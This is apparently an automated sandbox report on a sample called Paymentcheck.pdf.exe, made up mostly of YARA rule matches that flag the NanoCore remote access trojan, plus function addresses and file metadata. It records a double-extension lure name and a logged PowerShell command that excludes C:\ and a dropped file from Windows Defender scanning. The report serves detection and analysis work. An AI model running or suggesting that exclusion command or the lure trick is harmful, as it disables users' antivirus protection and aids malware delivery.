Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Executable has a suspicious name (potential lure to open the executable)Show sources
Source: Paymentcheck.pdf.exeStatic file information: Suspicious name
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Paymentcheck.pdf.exe
Source: initial sampleStatic PE information: Filename: Paymentcheck.pdf.exe
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F41AB0
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F40040
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F40026
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0793C3D8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A3DFE
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECE480
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECE471
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECBBD4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619E690
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06197230
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06198078
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619FB88
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F2A8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F366
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06198136
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A2A490
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A22880
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A2B168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795A788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07950368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07950E48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795EC50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07959728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795F6A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07955248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795B0C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07951E88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07959EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07957EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07955D28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DE4E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D8710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D8F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D0E5B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D1D88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DADF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D4D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D1D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DAB48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D59F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DC149
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 18_2_00993DFE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00E63DFE
Source: Paymentcheck.pdf.exeBinary or memory string: OriginalFilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.847261038.0000000007460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.849443394.0000000007700000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUyjtdycwlsevroaajvlbkd.dll" vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.850489798.0000000007BA0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeSection loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
Source: Paymentcheck.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
